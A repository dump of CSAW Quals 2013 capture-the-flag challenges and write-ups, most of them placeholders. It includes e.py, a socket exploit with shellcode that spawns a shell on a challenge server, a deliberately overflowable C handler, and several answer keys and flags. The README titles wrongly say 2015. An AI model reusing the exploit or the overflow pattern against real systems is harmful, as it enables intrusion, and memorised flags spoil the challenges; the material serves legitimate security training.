[exploitation/scp-hack-500](exploitation/scp-hack-500) 28 | * [misc/life-300](misc/life-300) 29 | * [reversing/bikinibonanza-150](reversing/bikinibonanza-150) 30 | * [reversing/crackme-300](reversing/crackme-300) 31 | * [reversing/csaw2013reversing1-100](reversing/csaw2013reversing1-100) 32 | * [reversing/csaw2013reversing2-200](reversing/csaw2013reversing2-200) 33 | * [reversing/dotnet-100](reversing/dotnet-100) 34 | * [reversing/impossible-500](reversing/impossible-500) 35 | * [reversing/keygenme-400](reversing/keygenme-400) 36 | * [reversing/noobs-first-firmware-mod-500](reversing/noobs-first-firmware-mod-500) 37 | * [web/cryptomatv2-400](web/cryptomatv2-400) 38 | * [web/guess-harder-100](web/guess-harder-100) 39 | * [web/herpderper-300](web/herpderper-300) 40 | * [web/nevernote-200](web/nevernote-200) 41 | * [web/widgetcorp-400](web/widgetcorp-400) -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/csawpad-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: CSAWpad 2 | 3 | **Category:** Crypto 4 | **Points:** 100 5 | **Solves:** 141 6 | **Description:** 7 | 8 | > [csawpad.py](csawpad.py) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: onlythisprogram 2 | 3 | **Category:** Crypto 4 | **Points:** 300 5 | **Solves:** 127 6 | **Description:** 7 | 8 | > [onlythisprogram.tgz](onlythisprogram.tgz) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/onlythisprogram.tgz -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/README: -------------------------------------------------------------------------------- 1 | QUESTION TEXT: 2 | 3 | I tested out my new encryption tool on some files from the internet and it seems like it worked pretty good. What do you think? 4 | 5 | FILE: onlythisprogram.tgz 6 | 7 | HINT (if necessary): 8 | 9 | You don't have to figure out the whole key to solve the challenge. Some file formats make better oracles than others. 10 | 11 | SOLVE: 12 | 13 | See solve.py for my half-solution with explanation. 14 | 15 | KEY: 16 | 17 | BuildYourOwnCryptoSoOthersHaveJobSecurity 18 | 19 | echo "For some reason psifertex really likes figlets. In this case it's necessary because the file size should not be a huge giveaway. Though I suppose images would have worked too. Anyway, the key is: BuildYourOwnCryptoSoOthersHaveJobSecurity"|sed 's/ / /g'|figlet -w 3000|gzip > key 20 | -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Hackers.mid -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/Tux_ecb.jpg -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/diagram.png -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/enigma.jpg -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/key.gz -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/linux-penguin5_blastfishing_com.bmp -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/logo.gif -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/nelson.doc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/input/shannon1948.pdf -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/onlythisprogram.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import os 3 | import sys 4 | import argparse 5 | 6 | blocksize=256 7 | 8 | parser = argparse.ArgumentParser(description="Custom encryption algorithm because a friend said that's the way to do it. Anyway, it's called 'Only This Program' since I'm pretty sure that only this program can securely decrypt the files as long as you don't give out your secret.dat file created when you encrypt something.") 9 | parser.add_argument('--infile', metavar='i', nargs='?', type=argparse.FileType('r'), help='input file, defaults to standard in', default=sys.stdin) 10 | parser.add_argument('--outfile', metavar='o', nargs='?', type=argparse.FileType('wb'), help='output file, defaults to standard out', default=sys.stdout) 11 | parser.add_argument('--secretkey', metavar='s', nargs='?', type=argparse.FileType('a+'), help='output file, defaults to secretkey.dat', default='secretkey.dat') 12 | 13 | args = parser.parse_args() 14 | 15 | 16 | sys.stderr.write('\nReading random bytes from OS. If hung, please introduce entropy.\n') 17 | 18 | args.secretkey.truncate() 19 | 20 | while (args.secretkey.tell() < blocksize): 21 | # maybe remove the next line for release since it makes it more obvious the key only generates once? 22 | sys.stdout.write('.') 23 | args.secretkey.write(os.urandom(1)) 24 | 25 | counter=0 26 | args.secretkey.seek(0) 27 | keydata = args.secretkey.read(blocksize) 28 | 29 | while 1: 30 | byte = args.infile.read(1) 31 | if not byte: 32 | break 33 | args.outfile.write(chr(ord(keydata[counter % len(keydata)]) ^ ord(byte))) 34 | counter+=1 35 | 36 | sys.stderr.write('\nSecret keyfile: %s\nInput file: %s\nOutput file: %s\nTotal bytes: %d \n' % (args.secretkey.name, args.infile.name, args.outfile.name, counter)) 37 | 38 | 39 | -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file0.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file1.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file2.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file3.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file4.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file5.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file6.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file7.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/output/file8.enc -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/runme.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | rm -rf output 3 | mkdir output 4 | rm secretkey.dat 5 | for file in input/* 6 | do 7 | ./onlythisprogram.py --infile $file --outfile output/file$((COUNT++)).enc 8 | done 9 | 10 | -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/crypto/onlythisprogram-300/source/secretkey.dat -------------------------------------------------------------------------------- /csaw-quals-2013/crypto/slurp-500/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: slurp 2 | 3 | **Category:** Crypto 4 | **Points:** 500 5 | **Solves:** 27 6 | **Description:** 7 | 8 | > We've found the source to the Arstotzka spies rendevous server, we must find out their new vault key. 9 | > 10 | > [slurp.py](slurp.py) 11 | > 12 | > nc 128.238.66.222 7788 13 | 14 | ## Write-up 15 | 16 | (TODO) 17 | 18 | ## Other write-ups and resources 19 | 20 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/csawdiary-300/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: CSAW Diary 2 | 3 | **Category:** Exploitation 4 | **Points:** 300 5 | **Solves:** 116 6 | **Description:** 7 | 8 | > nc 128.238.66.217 34266 9 | > 10 | > [fil_chal](fil_chal) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/csawdiary-300/fil_chal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/csawdiary-300/fil_chal -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit1-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Exploitation 1 2 | 3 | **Category:** Exploitation 4 | **Points:** 100 5 | **Solves:** 701 6 | **Description:** 7 | 8 | > nc 128.238.66.212 31337 9 | > 10 | > [exploit1](exploit1) 11 | > 12 | > [exploit1.c](exploit1.c) 13 | 14 | ## Write-up 15 | 16 | (TODO) 17 | 18 | ## Other write-ups and resources 19 | 20 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit1-100/exploit1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit1-100/exploit1 -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit1-100/exploit1.c: -------------------------------------------------------------------------------- 1 | [snip] 2 | 3 | void handle(int newsock) { 4 | int backdoor = 0; 5 | char buffer[1016]; 6 | memset(buffer, 0, 1016); 7 | 8 | send(newsock, "Welcome to CSAW CTF.", 21, 0); 9 | recv(newsock, buffer, 1020, 0); 10 | buffer[1015] = 0; 11 | 12 | if ( backdoor ) { 13 | fd = fopen("./key", "r"); 14 | fscanf(fd, "%s\n", buffer); 15 | send(newsock, buffer, 512, 0); 16 | } 17 | close(newsock); 18 | } 19 | 20 | [snip] -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit2-200/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Exploitation 200 2 | 3 | **Category:** Exploitation 4 | **Points:** 200 5 | **Solves:** 198 6 | **Description:** 7 | 8 | > nc 128.238.66.212 31338 9 | > 10 | > [exploit2](exploit2) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit2-200/e.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 4 | s.connect(("128.238.66.212", 31338)) 5 | 6 | i = s.recv(4) 7 | j = s.recv(4) 8 | print s.recv(100) 9 | 10 | payload = (("\x90"*100) + 11 | ("\x89\xe1\x66\x31\xc9\x31\xdb\xb3\x14\x31\xd2\xb2\x04\x4b\x75\x02\xcd\x03\x31\xc0\xb0\x03\xcd\x80\x3c\x04\x75\xf1\x81\x39\x0d\xf0\xfe\xca\x75\xe9\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80") + 12 | (j*473) + 13 | (i*10)) 14 | 15 | s.send(payload) 16 | s.send("\x0d\xf0\xfe\xca") 17 | s.send("cat key\n") 18 | print s.recv(100) 19 | -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/exploit2-200/exploit2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/exploit2-200/exploit2 -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/miteegashun-400/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: miteegashun 2 | 3 | **Category:** Exploitation 4 | **Points:** 400 5 | **Solves:** 85 6 | **Description:** 7 | 8 | > nc 128.238.66.221 5930 9 | > 10 | > [miteegashun](miteegashun) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/miteegashun-400/miteegashun: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/exploitation/miteegashun-400/miteegashun -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/scp-hack-500/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: SCP-hack 2 | 3 | **Category:** Exploitation 4 | **Points:** 500 5 | **Solves:** 7 6 | **Description:** 7 | 8 | > The SCP organization (http://128.238.66.211:45000) wants you to join, accept and see if you can take advantage of their interns sloppy coding and outdated browser. 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/exploitation/scp-hack-500/solution.txt: -------------------------------------------------------------------------------- 1 | http://blog.dragonsector.pl/2013/09/csaw-ctf-quals-2013-scp-hack.html 2 | -------------------------------------------------------------------------------- /csaw-quals-2013/misc/black-and-white-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Black & White 2 | 3 | **Category:** Misc 4 | **Points:** 100 5 | **Solves:** 818 6 | **Description:** 7 | 8 | > [chal.png](chal.png) 9 | 10 | ## Write-up 11 | 12 | We are given a PNG that seems to be just white. 13 | 14 | However, using a steganography tool like [stegsolve](https://aur.archlinux.org/packages/stegsolve/), we see the flag in the blue, red or green 0 pane: 15 | 16 | ![](key.png) 17 | 18 | The flag is `key{forensics_is_fun}`. 19 | 20 | ## Other write-ups and resources 21 | 22 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/misc/black-and-white-100/chal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/chal.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/black-and-white-100/key.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/black-and-white-100/key.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/1.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/2.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/IMG_0707.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: deeeeeeaaaaaadbeeeeeeeeeef 2 | 3 | **Category:** Misc 4 | **Points:** 200 5 | **Solves:** 224 6 | **Description:** 7 | 8 | > [IMG_0707.png](IMG_0707.png) 9 | 10 | ## Write-up 11 | 12 | We are given a corrupt PNG file: 13 | 14 | ```bash 15 | $ file IMG_0707.png 16 | IMG_0707.png: PNG image data, 3264 x 1681, 8-bit/color RGBA, non-interlaced 17 | $ pngcheck IMG_0707.png 18 | IMG_0707.png CRC error in chunk IHDR (computed fcc410a8, expected c1d0b3e4) 19 | ERROR: IMG_0707.png 20 | ``` 21 | 22 | Editing the CRC for the PNG in `hexedit` to the correct one, yields a valid PNG: 23 | 24 | ![](1.png) 25 | ![](2.png) 26 | ![](resized_for_repo.png) 27 | 28 | The picture looks like it has been resized, however, given the unusual aspect ratio of `3264:1681 ~= 1.94:1`. 29 | We see using `exiftool` that the picture is made with an iPhone 5: 30 | 31 | ```bash 32 | $ exiftool IMG_0707.png 33 | ExifTool Version Number : 9.76 34 | [...] 35 | Source : iPhone 5 36 | Software : 6.1.4 37 | [...] 38 | Image Size : 3264x1681 39 | ``` 40 | 41 | The usual ratio of picture made by an [iPhone 5 camera](http://en.wikipedia.org/wiki/IPhone#Screen_and_input) is around `16:9` or `4:3`, so we apply the ratio to the picture using `hexedit` and fix the resulting new CRC sum: 42 | 43 | ![](wxh_orig.png) 44 | ![](wxh_fixd.png) 45 | ```bash 46 | $ pngcheck NEW.png 47 | NEW.png CRC error in chunk IHDR (computed f754da63, expected fcc410a8) 48 | ERROR: NEW.png 49 | ``` 50 | ![](crc_fixd.png) 51 | ![](flag.png) 52 | 53 | The flag is `Key{TheISISPasswordIs}`. 54 | ## Other write-ups and resources 55 | 56 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/crc_fixd.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/flag.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/resized_for_repo.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_fixd.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/deeeeeeaaaaaadbeeeeeeeeeef-200/wxh_orig.png -------------------------------------------------------------------------------- /csaw-quals-2013/misc/life-300/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Life 2 | 3 | **Category:** Misc 4 | **Points:** 300 5 | **Solves:** 212 6 | **Description:** 7 | 8 | > 9 | > 10 | > nc 128.238.66.216 45678 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/misc/life-300/source.txt: -------------------------------------------------------------------------------- 1 | Coming soon! Ping fuzyll if you need it sooner. 2 | 3 | fuzyll@fuzyll.com 4 | -------------------------------------------------------------------------------- /csaw-quals-2013/misc/network1-50/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Networking 1 2 | 3 | **Category:** Misc 4 | **Points:** 50 5 | **Solves:** 1004 6 | **Description:** 7 | 8 | > [networking.pcap](networking.pcap) 9 | 10 | ## Write-up 11 | 12 | We can find the flag in the tcpdump using `strings`: 13 | 14 | ```bash 15 | $ file networking.pcap 16 | networking.pcap: tcpdump capture file (little-endian) - version 2.4 (Ethernet, capture length 65535) 17 | $ strings -a networking.pcap | sort | uniq 18 | 19 | )&~ 20 | 38400,38400 21 | Login incorrect 22 | Password: 23 | Ubuntu 12.04.2 LTS 24 | XTERM 25 | flag{d316759c281bf925d600be698a4973d5} 26 | hockeyinjune-virtual-machine login: 27 | ``` 28 | 29 | The flag is `flag{d316759c281bf925d600be698a4973d5}`. 30 | 31 | ## Other write-ups and resources 32 | 33 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/misc/network1-50/networking.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network1-50/networking.pcap -------------------------------------------------------------------------------- /csaw-quals-2013/misc/network2-50/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: Networking 2 2 | 3 | **Category:** Misc 4 | **Points:** 50 5 | **Solves:** 864 6 | **Description:** 7 | 8 | > [networking.pcap](networking.pcap) 9 | > 10 | > [networking.pcap.process](networking.pcap.process) 11 | 12 | ## Write-up 13 | 14 | We are given the same tcpdump as [network1-50](../network1-50/): 15 | 16 | ```bash 17 | $ diff networking.pcap ../network1-50/networking.pcap 18 | $ [...] 19 | ``` 20 | 21 | However, we are also given a `networking.pcap.process` file, which contains the flag: 22 | 23 | ```bash 24 | $ strings -a networking.pcap.process | sort | uniq 25 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe 26 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe 27 | 28 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe! 29 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe" 30 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe$ 31 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe% 32 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe' 33 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe( 34 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe* 35 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe+ 36 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe- 37 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe/ 38 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe0 39 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe1 40 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe2 41 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe3 42 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe5 43 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe7 44 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe8 45 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe: 46 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe; 47 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe< 48 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe= 49 | flag{f9b43c9e9c05be5e08ea163007af5144}.exe? 50 | ``` 51 | 52 | The flag is `flag{f9b43c9e9c05be5e08ea163007af5144}`. 53 | 54 | ## Other write-ups and resources 55 | 56 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/misc/network2-50/networking.pcap: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap -------------------------------------------------------------------------------- /csaw-quals-2013/misc/network2-50/networking.pcap.process: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/misc/network2-50/networking.pcap.process -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/bikinibonanza-150/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: bikinibonanza 2 | 3 | **Category:** Reversing 4 | **Points:** 150 5 | **Solves:** 316 6 | **Description:** 7 | 8 | > [bikinibonanza.exe](bikinibonanza.exe) 9 | > 10 | > If your key isn't working PM ColdHeat on IRC 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/bikinibonanza-150/bikinibonanza.exe -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/crackme-300/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: crackme 2 | 3 | **Category:** Reversing 4 | **Points:** 300 5 | **Solves:** 174 6 | **Description:** 7 | 8 | > nc 128.238.66.218 54321 9 | > 10 | > [crackme](crackme) 11 | 12 | ## Write-up 13 | 14 | (TODO) 15 | 16 | ## Other write-ups and resources 17 | 18 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/crackme-300/crackme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/crackme-300/crackme -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/csaw2013reversing1-100/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 1 2 | 3 | **Category:** Reversing 4 | **Points:** 100 5 | **Solves:** 644 6 | **Description:** 7 | 8 | > [csaw2013reversing1.exe](csaw2013reversing1.exe) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/csaw-quals-2013/reversing/csaw2013reversing1-100/csaw2013reversing1.exe -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/csaw2013reversing2-200/README.md: -------------------------------------------------------------------------------- 1 | # CSAW Quals CTF 2015: CSAW Reversing 2013 2 2 | 3 | **Category:** Reversing 4 | **Points:** 200 5 | **Solves:** 357 6 | **Description:** 7 | 8 | > [csaw2013reversing2.exe](csaw2013reversing2.exe) 9 | 10 | ## Write-up 11 | 12 | (TODO) 13 | 14 | ## Other write-ups and resources 15 | 16 | * none yet -------------------------------------------------------------------------------- /csaw-quals-2013/reversing/csaw2013reversing2-200/csaw2013reversing2.exe: 